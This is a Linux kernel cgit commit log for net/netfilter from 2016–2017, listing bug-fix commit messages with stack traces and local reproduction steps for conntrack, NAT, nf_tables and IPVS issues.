summaryrefslogtreecommitdiff
path: root/net/netfilter
AgeCommit message (Collapse)Author
2017-11-15netfilter: nft_meta: deal with PACKET_LOOPBACK in netdev familyLiping Zhang
[ Upstream commit f169fd695b192dd7b23aff8e69d25a1bc881bbfa ] After adding the following nft rule, then ping 224.0.0.1: # nft add rule netdev t c pkttype host counter The warning complain message will be printed out again and again: WARNING: CPU: 0 PID: 10182 at net/netfilter/nft_meta.c:163 \ nft_meta_get_eval+0x3fe/0x460 [nft_meta] [...] Call Trace: <IRQ> dump_stack+0x85/0xc2 __warn+0xcb/0xf0 warn_slowpath_null+0x1d/0x20 nft_meta_get_eval+0x3fe/0x460 [nft_meta] nft_do_chain+0xff/0x5e0 [nf_tables] So we should deal with PACKET_LOOPBACK in netdev family too. For ipv4, convert it to PACKET_BROADCAST/MULTICAST according to the destination address's type; For ipv6, convert it to PACKET_MULTICAST directly. Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-10-21netfilter: nf_ct_expect: Change __nf_ct_expect_check() return value.Jarno Rajahalme
[ Upstream commit 4b86c459c7bee3acaf92f0e2b4c6ac803eaa1a58 ] Commit 4dee62b1b9b4 ("netfilter: nf_ct_expect: nf_ct_expect_insert() returns void") inadvertently changed the successful return value of nf_ct_expect_related_report() from 0 to 1 due to __nf_ct_expect_check() returning 1 on success. Prevent this regression in the future by changing the return value of __nf_ct_expect_check() to 0 on success. Signed-off-by: Jarno Rajahalme <jarno@ovn.org> Acked-by: Joe Stringer <joe@ovn.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-10-08netfilter: nfnl_cthelper: fix incorrect helper->expect_class_maxLiping Zhang
[ Upstream commit ae5c682113f9f94cc5e76f92cf041ee624c173ee ] The helper->expect_class_max must be set to the total number of expect_policy minus 1, since we will use the statement "if (class > helper->expect_class_max)" to validate the CTA_EXPECT_CLASS attr in ctnetlink_alloc_expect. So for compatibility, set the helper->expect_class_max to the NFCTH_POLICY_SET_NUM attr's value minus 1. Also: it's invalid when the NFCTH_POLICY_SET_NUM attr's value is zero. 1. this will result "expect_policy = kzalloc(0, GFP_KERNEL);"; 2. we cannot set the helper->expect_class_max to a proper value. So if nla_get_be32(tb[NFCTH_POLICY_SET_NUM]) is zero, report -EINVAL to the userspace. Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-10-08netfilter: invoke synchronize_rcu after set the _hook_ to NULLLiping Zhang
[ Upstream commit 3b7dabf029478bb80507a6c4500ca94132a2bc0b ] Otherwise, another CPU may access the invalid pointer. For example: CPU0 CPU1 - rcu_read_lock(); - pfunc = _hook_; _hook_ = NULL; - mod unload - - pfunc(); // invalid, panic - rcu_read_unlock(); So we must call synchronize_rcu() to wait the rcu reader to finish. Also note, in nf_nat_snmp_basic_fini, synchronize_rcu() will be invoked by later nf_conntrack_helper_unregister, but I'm inclined to add a explicit synchronize_rcu after set the nf_nat_snmp_hook to NULL. Depend on such obscure assumptions is not a good idea. Last, in nfnetlink_cttimeout, we use kfree_rcu to free the time object, so in cttimeout_exit, invoking rcu_barrier() is not necessary at all, remove it too. Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-09-27net/netfilter/nf_conntrack_core: Fix net_conntrack_lock()Manfred Spraul
commit 3ef0c7a730de0bae03d86c19570af764fa3c4445 upstream. As we want to remove spin_unlock_wait() and replace it with explicit spin_lock()/spin_unlock() calls, we can use this to simplify the locking. In addition: - Reading nf_conntrack_locks_all needs ACQUIRE memory ordering. - The new code avoids the backwards loop. Only slightly tested, I did not manage to trigger calls to nf_conntrack_all_lock(). V2: With improved comments, to clearly show how the barriers pair. Fixes: b16c29191dc8 ("netfilter: nf_conntrack: use safer way to lock all buckets") Signed-off-by: Manfred Spraul <manfred@colorfullife.com> Cc: Alan Stern <stern@rowland.harvard.edu> Cc: Sasha Levin <sasha.levin@oracle.com> Cc: Pablo Neira Ayuso <pablo@netfilter.org> Cc: netfilter-devel@vger.kernel.org Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-08-30netfilter: nat: fix src map lookupFlorian Westphal
commit 97772bcd56efa21d9d8976db6f205574ea602f51 upstream. When doing initial conversion to rhashtable I replaced the bucket walk with a single rhashtable_lookup_fast(). When moving to rhlist I failed to properly walk the list of identical tuples, but that is what is needed for this to work correctly. The table contains the original tuples, so the reply tuples are all distinct. We currently decide that mapping is (not) in range only based on the first entry, but in case its not we need to try the reply tuple of the next entry until we either find an in-range mapping or we checked all the entries. This bug makes nat core attempt collision resolution while it might be able to use the mapping as-is. Fixes: 870190a9ec90 ("netfilter: nat: convert nat bysrc hash to rhashtable") Reported-by: Jaco Kroon <jaco@uls.co.za> Tested-by: Jaco Kroon <jaco@uls.co.za> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-08-25netfilter: nf_ct_ext: fix possible panic after nf_ct_extend_unregisterLiping Zhang
commit 9c3f3794926a997b1cab6c42480ff300efa2d162 upstream. If one cpu is doing nf_ct_extend_unregister while another cpu is doing __nf_ct_ext_add_length, then we may hit BUG_ON(t == NULL). Moreover, there's no synchronize_rcu invocation after set nf_ct_ext_types[id] to NULL, so it's possible that we may access invalid pointer. But actually, most of the ct extends are built-in, so the problem listed above will not happen. However, there are two exceptions: NF_CT_EXT_NAT and NF_CT_EXT_SYNPROXY. For _EXT_NAT, the panic will not happen, since adding the nat extend and unregistering the nat extend are located in the same file(nf_nat_core.c), this means that after the nat module is removed, we cannot add the nat extend too. For _EXT_SYNPROXY, synproxy extend may be added by init_conntrack, while synproxy extend unregister will be done by synproxy_core_exit. So after nf_synproxy_core.ko is removed, we may still try to add the synproxy extend, then kernel panic may happen. I know it's very hard to reproduce this issue, but I can play a tricky game to make it happen very easily :) Step 1. Enable SYNPROXY for tcp dport 1234 at FORWARD hook: # iptables -I FORWARD -p tcp --dport 1234 -j SYNPROXY Step 2. Queue the syn packet to the userspace at raw table OUTPUT hook. Also note, in the userspace we only add a 20s' delay, then reinject the syn packet to the kernel: # iptables -t raw -I OUTPUT -p tcp --syn -j NFQUEUE --queue-num 1 Step 3. Using "nc 2.2.2.2 1234" to connect the server. Step 4. Now remove the nf_synproxy_core.ko quickly: # iptables -F FORWARD # rmmod ipt_SYNPROXY # rmmod nf_synproxy_core Step 5. After 20s' delay, the syn packet is reinjected to the kernel. Now you will see the panic like this: kernel BUG at net/netfilter/nf_conntrack_extend.c:91! Call Trace: ? __nf_ct_ext_add_length+0x53/0x3c0 [nf_conntrack] init_conntrack+0x12b/0x600 [nf_conntrack] nf_conntrack_in+0x4cc/0x580 [nf_conntrack] ipv4_conntrack_local+0x48/0x50 [nf_conntrack_ipv4] nf_reinject+0x104/0x270 nfqnl_recv_verdict+0x3e1/0x5f9 [nfnetlink_queue] ? nfqnl_recv_verdict+0x5/0x5f9 [nfnetlink_queue] ? nla_parse+0xa0/0x100 nfnetlink_rcv_msg+0x175/0x6a9 [nfnetlink] [...] One possible solution is to make NF_CT_EXT_SYNPROXY extend built-in, i.e. introduce nf_conntrack_synproxy.c and only do ct extend register and unregister in it, similar to nf_conntrack_timeout.c. But having such a obscure restriction of nf_ct_extend_unregister is not a good idea, so we should invoke synchronize_rcu after set nf_ct_ext_types to NULL, and check the NULL pointer when do __nf_ct_ext_add_length. Then it will be easier if we add new ct extend in the future. Last, we use kfree_rcu to free nf_ct_ext, so rcu_barrier() is unnecessary anymore, remove it too. Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Acked-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Cc: Stefan Bader <stefan.bader@canonical.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-07-27ipvs: SNAT packet replies only for NATed connectionsJulian Anastasov
commit 3c5ab3f395d66a9e4e937fcfdf6ebc63894f028b upstream. We do not check if packet from real server is for NAT connection before performing SNAT. This causes problems for setups that use DR/TUN and allow local clients to access the real server directly, for example: - local client in director creates IPVS-DR/TUN connection CIP->VIP and the request packets are routed to RIP. Talks are finished but IPVS connection is not expired yet. - second local client creates non-IPVS connection CIP->RIP with same reply tuple RIP->CIP and when replies are received on LOCAL_IN we wrongly assign them for the first client connection because RIP->CIP matches the reply direction. As result, IPVS SNATs replies for non-IPVS connections. The problem is more visible to local UDP clients but in rare cases it can happen also for TCP or remote clients when the real server sends the reply traffic via the director. So, better to be more precise for the reply traffic. As replies are not expected for DR/TUN connections, better to not touch them. Reported-by: Nick Moriarty <nick.moriarty@york.ac.uk> Tested-by: Nick Moriarty <nick.moriarty@york.ac.uk> Signed-off-by: Julian Anastasov <ja@ssi.bg> Signed-off-by: Simon Horman <horms@verge.net.au> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-07-05netfilter: synproxy: fix conntrackd interactionEric Leblond
commit 87e94dbc210a720a34be5c1174faee5c84be963e upstream. This patch fixes the creation of connection tracking entry from netlink when synproxy is used. It was missing the addition of the synproxy extension. This was causing kernel crashes when a conntrack entry created by conntrackd was used after the switch of traffic from active node to the passive node. Signed-off-by: Eric Leblond <eric@regit.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-07-05netfilter: xt_TCPMSS: add more sanity tests on tcph->doffEric Dumazet
commit 2638fd0f92d4397884fd991d8f4925cb3f081901 upstream. Denys provided an awesome KASAN report pointing to an use after free in xt_TCPMSS I have provided three patches to fix this issue, either in xt_TCPMSS or in xt_tcpudp.c. It seems xt_TCPMSS patch has the smallest possible impact. Signed-off-by: Eric Dumazet <edumazet@google.com> Reported-by: Denys Fedoryshchenko <nuclearcat@nuclearcat.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-06-17netfilter: nft_log: restrict the log prefix length to 127Liping Zhang
[ Upstream commit 5ce6b04ce96896e8a79e6f60740ced911eaac7a4 ] First, log prefix will be truncated to NF_LOG_PREFIXLEN-1, i.e. 127, at nf_log_packet(), so the extra part is useless. Second, after adding a log rule with a very very long prefix, we will fail to dump the nft rules after this _special_ one, but acctually, they do exist. For example: # name_65000=$(printf "%0.sQ" {1..65000}) # nft add rule filter output log prefix "$name_65000" # nft add rule filter output counter # nft add rule filter output counter # nft list chain filter output table ip filter { chain output { type filter hook output priority 0; policy accept; } } So now, restrict the log prefix length to NF_LOG_PREFIXLEN-1. Fixes: 96518518cc41 ("netfilter: add nftables") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-06-17netfilter: nf_tables: fix set->nelems counting with no NLM_F_EXCLPablo Neira Ayuso
[ Upstream commit 35d0ac9070ef619e3bf44324375878a1c540387b ] If the element exists and no NLM_F_EXCL is specified, do not bump set->nelems, otherwise we leak one set element slot. This problem amplifies if the set is full since the abort path always decrements the counter for the -ENFILE case too, giving one spare extra slot. Fix this by moving set->nelems update to nft_add_set_elem() after successful element insertion. Moreover, remove the element if the set is full so there is no need to rely on the abort path to undo things anymore. Fixes: c016c7e45ddf ("netfilter: nf_tables: honor NLM_F_EXCL flag in set element insertion") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Sasha Levin <alexander.levin@verizon.com> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-06-17netfilter: nf_conntrack_sip: fix wrong memory initialisationChristophe Leroy
commit da2f27e9e615d1c799c9582b15262458da61fddc upstream. In commit 82de0be6862cd ("netfilter: Add helper array register/unregister functions"), struct nf_conntrack_helper sip[MAX_PORTS][4] was changed to sip[MAX_PORTS * 4], so the memory init should have been changed to memset(&sip[4 * i], 0, 4 * sizeof(sip[i])); But as the sip[] table is allocated in the BSS, it is already set to 0 Fixes: 82de0be6862cd ("netfilter: Add helper array register/unregister functions") Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-06-14netfilter: nft_set_rbtree: handle element re-addition after deletionPablo Neira Ayuso
commit d2df92e98a34a5619dadd29c6291113c009181e7 upstream. The existing code selects no next branch to be inspected when re-inserting an inactive element into the rb-tree, looping endlessly. This patch restricts the check for active elements to the EEXIST case only. Fixes: e701001e7cbe ("netfilter: nft_rbtree: allow adjacent intervals with dynamic updates") Reported-by: Wolfgang Bumiller <w.bumiller@proxmox.com> Tested-by: Wolfgang Bumiller <w.bumiller@proxmox.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-03-12netfilter: conntrack: refine gc worker heuristics, reduxFlorian Westphal
commit e5072053b09642b8ff417d47da05b84720aea3ee upstream. This further refines the changes made to conntrack gc_worker in commit e0df8cae6c16 ("netfilter: conntrack: refine gc worker heuristics"). The main idea of that change was to reduce the scan interval when evictions take place. However, on the reporters' setup, there are 1-2 million conntrack entries in total and roughly 8k new (and closing) connections per second. In this case we'll always evict at least one entry per gc cycle and scan interval is always at 1 jiffy because of this test: } else if (expired_count) { gc_work->next_gc_run /= 2U; next_run = msecs_to_jiffies(1); being true almost all the time. Given we scan ~10k entries per run its clearly wrong to reduce interval based on nonzero eviction count, it will only waste cpu cycles since a vast majorities of conntracks are not timed out. Thus only look at the ratio (scanned entries vs. evicted entries) to make a decision on whether to reduce or not. Because evictor is supposed to only kick in when system turns idle after a busy period, pick a high ratio -- this makes it 50%. We thus keep the idea of increasing scan rate when its likely that table contains many expired entries. In order to not let timed-out entries hang around for too long (important when using event logging, in which case we want to timely destroy events), we now scan the full table within at most GC_MAX_SCAN_JIFFIES (16 seconds) even in worst-case scenario where all timed-out entries sit in same slot. I tested this with a vm under synflood (with sysctl net.netfilter.nf_conntrack_tcp_timeout_syn_recv=3). While flood is ongoing, interval now stays at its max rate (GC_MAX_SCAN_JIFFIES / GC_MAX_BUCKETS_DIV -> 125ms). With feedback from Nicolas Dichtel. Reported-by: Denys Fedoryshchenko <nuclearcat@nuclearcat.com> Cc: Nicolas Dichtel <nicolas.dichtel@6wind.com> Fixes: b87a2f9199ea82eaadc ("netfilter: conntrack: add gc worker to remove timed-out entries") Signed-off-by: Florian Westphal <fw@strlen.de> Tested-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Acked-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Tested-by: Denys Fedoryshchenko <nuclearcat@nuclearcat.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-03-12netfilter: conntrack: remove GC_MAX_EVICTS breakFlorian Westphal
commit 524b698db06b9b6da7192e749f637904e2f62d7b upstream. Instead of breaking loop and instant resched, don't bother checking this in first place (the loop calls cond_resched for every bucket anyway). Suggested-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Signed-off-by: Florian Westphal <fw@strlen.de> Acked-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2017-02-26netfilter: nf_ct_helper: warn when not applying default helper assignmentJiri Kosina
commit dfe75ff8ca74f54b0fa5a326a1aa9afa485ed802 upstream. Commit 3bb398d925 ("netfilter: nf_ct_helper: disable automatic helper assignment") is causing behavior regressions in firewalls, as traffic handled by conntrack helpers is now by default not passed through even though it was before due to missing CT targets (which were not necessary before this commit). The default had to be switched off due to security reasons [1] [2] and therefore should stay the way it is, but let's be friendly to firewall admins and issue a warning the first time we're in situation where packet would be likely passed through with the old default but we're likely going to drop it on the floor now. Rewrite the code a little bit as suggested by Linus, so that we avoid spaghettiing the code even more -- namely the whole decision making process regarding helper selection (either automatic or not) is being separated, so that the whole logic can be simplified and code (condition) duplication reduced. [1] https://cansecwest.com/csw12/conntrack-attack.pdf [2] https://home.regit.org/netfilter-en/secure-use-of-helpers/ Signed-off-by: Jiri Kosina <jkosina@suse.cz> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-24netfilter: nft_range: add the missing NULL pointer checkLiping Zhang
Otherwise, kernel panic will happen if the user does not specify the related attributes. Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-24netfilter: nf_tables: fix inconsistent element expiration calculationAnders K. Pedersen
As Liping Zhang reports, after commit a8b1e36d0d1d ("netfilter: nft_dynset: fix element timeout for HZ != 1000"), priv->timeout was stored in jiffies, while set->timeout was stored in milliseconds. This is inconsistent and incorrect. Firstly, we already call msecs_to_jiffies in nft_set_elem_init, so priv->timeout will be converted to jiffies twice. Secondly, if the user did not specify the NFTA_DYNSET_TIMEOUT attr, set->timeout will be used, but we forget to call msecs_to_jiffies when do update elements. Fix this by using jiffies internally for traditional sets and doing the conversions to/from msec when interacting with userspace - as dynset already does. This is preferable to doing the conversions, when elements are inserted or updated, because this can happen very frequently on busy dynsets. Fixes: a8b1e36d0d1d ("netfilter: nft_dynset: fix element timeout for HZ != 1000") Reported-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Acked-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-24netfilter: nat: switch to new rhlist interfaceFlorian Westphal
I got offlist bug report about failing connections and high cpu usage. This happens because we hit 'elasticity' checks in rhashtable that refuses bucket list exceeding 16 entries. The nat bysrc hash unfortunately needs to insert distinct objects that share same key and are identical (have same source tuple), this cannot be avoided. Switch to the rhlist interface which is designed for this. The nulls_base is removed here, I don't think its needed: A (unlikely) false positive results in unneeded port clash resolution, a false negative results in packet drop during conntrack confirmation, when we try to insert the duplicate into main conntrack hash table. Tested by adding multiple ip addresses to host, then adding iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE ... and then creating multiple connections, from same source port but different addresses: for i in $(seq 2000 2032);do nc -p 1234 192.168.7.1 $i > /dev/null & done (all of these then get hashed to same bysource slot) Then, to test that nat conflict resultion is working: nc -s 10.0.0.1 -p 1234 192.168.7.1 2000 nc -s 10.0.0.2 -p 1234 192.168.7.1 2000 tcp .. src=10.0.0.1 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1024 [ASSURED] tcp .. src=10.0.0.2 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1025 [ASSURED] tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1234 [ASSURED] tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2001 src=192.168.7.1 dst=192.168.7.10 sport=2001 dport=1234 [ASSURED] [..] -> nat altered source ports to 1024 and 1025, respectively. This can also be confirmed on destination host which shows ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1024 ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1025 ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1234 Cc: Herbert Xu <herbert@gondor.apana.org.au> Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable") Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-24netfilter: nat: fix cmp return valueFlorian Westphal
The comparator works like memcmp, i.e. 0 means objects are equal. In other words, when objects are distinct they are treated as identical, when they are distinct they are allegedly the same. The first case is rare (distinct objects are unlikely to get hashed to same bucket). The second case results in unneeded port conflict resolutions attempts. Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable") Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-24netfilter: nft_hash: validate maximum value of u32 netlink hash attributeLaura Garcia Liebana
Use the function nft_parse_u32_check() to fetch the value and validate the u32 attribute into the hash len u8 field. This patch revisits 4da449ae1df9 ("netfilter: nft_exthdr: Add size check on u8 nft_exthdr attributes"). Fixes: cb1b69b0b15b ("netfilter: nf_tables: add hash expression") Signed-off-by: Laura Garcia Liebana <nevola@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08netfilter: nf_tables: fix oops when inserting an element into a verdict mapLiping Zhang
Dalegaard says: The following ruleset, when loaded with 'nft -f bad.txt' ----snip---- flush ruleset table ip inlinenat { map sourcemap { type ipv4_addr : verdict; } chain postrouting { ip saddr vmap @sourcemap accept } } add chain inlinenat test add element inlinenat sourcemap { 100.123.10.2 : jump test } ----snip---- results in a kernel oops: BUG: unable to handle kernel paging request at 0000000000001344 IP: [<ffffffffa07bf704>] nf_tables_check_loops+0x114/0x1f0 [nf_tables] [...] Call Trace: [<ffffffffa07c2aae>] ? nft_data_init+0x13e/0x1a0 [nf_tables] [<ffffffffa07c1950>] nft_validate_register_store+0x60/0xb0 [nf_tables] [<ffffffffa07c74b5>] nft_add_set_elem+0x545/0x5e0 [nf_tables] [<ffffffffa07bfdd0>] ? nft_table_lookup+0x30/0x60 [nf_tables] [<ffffffff8132c630>] ? nla_strcmp+0x40/0x50 [<ffffffffa07c766e>] nf_tables_newsetelem+0x11e/0x210 [nf_tables] [<ffffffff8132c400>] ? nla_validate+0x60/0x80 [<ffffffffa030d9b4>] nfnetlink_rcv+0x354/0x5a7 [nfnetlink] Because we forget to fill the net pointer in bind_ctx, so dereferencing it may cause kernel crash. Reported-by: Dalegaard <dalegaard@gmail.com> Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08netfilter: conntrack: refine gc worker heuristicsFlorian Westphal
Nicolas Dichtel says: After commit b87a2f9199ea ("netfilter: conntrack: add gc worker to remove timed-out entries"), netlink conntrack deletion events may be sent with a huge delay. Nicolas further points at this line: goal = min(nf_conntrack_htable_size / GC_MAX_BUCKETS_DIV, GC_MAX_BUCKETS); and indeed, this isn't optimal at all. Rationale here was to ensure that we don't block other work items for too long, even if nf_conntrack_htable_size is huge. But in order to have some guarantee about maximum time period where a scan of the full conntrack table completes we should always use a fixed slice size, so that once every N scans the full table has been examined at least once. We also need to balance this vs. the case where the system is either idle (i.e., conntrack table (almost) empty) or very busy (i.e. eviction happens from packet path). So, after some discussion with Nicolas: 1. want hard guarantee that we scan entire table at least once every X s -> need to scan fraction of table (get rid of upper bound) 2. don't want to eat cycles on idle or very busy system -> increase interval if we did not evict any entries 3. don't want to block other worker items for too long -> make fraction really small, and prefer small scan interval instead 4. Want reasonable short time where we detect timed-out entry when system went idle after a burst of traffic, while not doing scans all the time. -> Store next gc scan in worker, increasing delays when no eviction happened and shrinking delay when we see timed out entries. The old gc interval is turned into a max number, scans can now happen every jiffy if stale entries are present. Longest possible time period until an entry is evicted is now 2 minutes in worst case (entry expires right after it was deemed 'not expired'). Reported-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Signed-off-by: Florian Westphal <fw@strlen.de> Acked-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08netfilter: conntrack: fix CT target for UNSPEC helpersFlorian Westphal
Thomas reports its not possible to attach the H.245 helper: iptables -t raw -A PREROUTING -p udp -j CT --helper H.245 iptables: No chain/target/match by that name. xt_CT: No such helper "H.245" This is because H.245 registers as NFPROTO_UNSPEC, but the CT target passes NFPROTO_IPV4/IPV6 to nf_conntrack_helper_try_module_get. We should treat UNSPEC as wildcard and ignore the l3num instead. Reported-by: Thomas Woerner <twoerner@redhat.com> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08netfilter: connmark: ignore skbs with magic untracked conntrack objectsFlorian Westphal
The (percpu) untracked conntrack entries can end up with nonzero connmarks. The 'untracked' conntrack objects are merely a way to distinguish INVALID (i.e. protocol connection tracker says payload doesn't meet some requirements or packet was never seen by the connection tracking code) from packets that are intentionally not tracked (some icmpv6 types such as neigh solicitation, or by using 'iptables -j CT --notrack' option). Untracked conntrack objects are implementation detail, we might as well use invalid magic address instead to tell INVALID and UNTRACKED apart. Check skb->nfct for untracked dummy and behave as if skb->nfct is NULL. Reported-by: XU Tianwen <evan.xu.tianwen@gmail.com> Signed-off-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-11-08ipvs: use IPVS_CMD_ATTR_MAX for family.maxattrWANG Cong
family.maxattr is the max index for policy[], the size of ops[] is determined with ARRAY_SIZE(). Reported-by: Andrey Konovalov <andreyknvl@google.com> Tested-by: Andrey Konovalov <andreyknvl@google.com> Cc: Pablo Neira Ayuso <pablo@netfilter.org> Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com> Signed-off-by: Simon Horman <horms@verge.net.au> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-31netfilter: nf_tables: destroy the set if fail to add transactionLiping Zhang
When the memory is exhausted, then we will fail to add the NFT_MSG_NEWSET transaction. In such case, we should destroy the set before we free it. Fixes: 958bee14d071 ("netfilter: nf_tables: use new transaction infrastructure to handle sets") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-28netfilter: ip_vs_sync: fix bogus maybe-uninitialized warningArnd Bergmann
Building the ip_vs_sync code with CONFIG_OPTIMIZE_INLINING on x86 confuses the compiler to the point where it produces a rather dubious warning message: net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized] struct ip_vs_sync_conn_options opt; ^~~ net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized] net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized] net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized] net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized] net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized] The problem appears to be a combination of a number of factors, including the __builtin_bswap32 compiler builtin being slightly odd, having a large amount of code inlined into a single function, and the way that some functions only get partially inlined here. I've spent way too much time trying to work out a way to improve the code, but the best I've come up with is to add an explicit memset right before the ip_vs_seq structure is first initialized here. When the compiler works correctly, this has absolutely no effect, but in the case that produces the warning, the warning disappears. In the process of analysing this warning, I also noticed that we use memcpy to copy the larger ip_vs_sync_conn_options structure over two members of the ip_vs_conn structure. This works because the layout is identical, but seems error-prone, so I'm changing this in the process to directly copy the two members. This change seemed to have no effect on the object code or the warning, but it deals with the same data, so I kept the two changes together. Signed-off-by: Arnd Bergmann <arnd@arndb.de> Acked-by: Julian Anastasov <ja@ssi.bg> Signed-off-by: Simon Horman <horms@verge.net.au> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27netfilter: nf_tables: fix type mismatch with error return from ↵John W. Linville
nft_parse_u32_check Commit 36b701fae12ac ("netfilter: nf_tables: validate maximum value of u32 netlink attributes") introduced nft_parse_u32_check with a return value of "unsigned int", yet on error it returns "-ERANGE". This patch corrects the mismatch by changing the return value to "int", which happens to match the actual users of nft_parse_u32_check already. Found by Coverity, CID 1373930. Note that commit 21a9e0f1568ea ("netfilter: nft_exthdr: fix error handling in nft_exthdr_init()) attempted to address the issue, but did not address the return type of nft_parse_u32_check. Signed-off-by: John W. Linville <linville@tuxdriver.com> Cc: Laura Garcia Liebana <nevola@gmail.com> Cc: Pablo Neira Ayuso <pablo@netfilter.org> Cc: Dan Carpenter <dan.carpenter@oracle.com> Fixes: 36b701fae12ac ("netfilter: nf_tables: validate maximum value...") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27netfilter: nf_conntrack_sip: extend request line validationUlrich Weber
